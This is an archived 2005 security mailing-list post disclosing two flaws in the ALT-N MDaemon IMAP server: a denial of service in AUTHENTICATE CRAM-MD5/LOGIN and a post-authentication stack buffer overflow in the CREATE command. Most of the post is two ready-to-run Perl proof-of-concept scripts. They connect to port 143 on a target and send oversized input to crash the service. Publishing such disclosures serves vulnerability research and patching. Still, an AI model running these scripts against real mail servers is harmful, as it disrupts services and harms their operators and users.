| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <42DBF3C9.50503@gmx.net>
Date: Tue Jul 19 00:02:54 2005
From: kingcope at gmx.net (kcope)
Subject: ALT-N MDaemon multiple vulnerabilities
Hello this is kcope,
there are two remote vulnerabilities in the latest ALT-N MDaemon imapd
product
i don't know if any of them is exploitable .. the stack based buffer
overflow
seems promising, but it's not preauth so i didn't investigate it further.
1.) Remote denial of service in AUTHENTICATE LOGIN and AUTHENTICATE CRAM-MD5
2.) Remote stack based buffer overflow after authentication in the imap
CREATE statement
---snip---
###
### MDAEMON remote DoS exploit by kcope
### looks like there?s a fault in the base64 decoder
### works also for AUTHENTICATE LOGIN
###
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '143',
Proto => 'tcp');
$a = "q" x 1000;
print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
print $sock $a,"\r\n";
print $sock $a,"\r\n";
while (<$sock>) {
print $_;
}
---snip---
---snip---
### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '143',
Proto => 'tcp');
$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;
print $sock "a001 LOGIN username password\r\n";
print $sock "a001 CREATE $a\r\n";
while (<$sock>) {
print $_;
}
---snip---
-kcope
Powered by blists - more mailing lists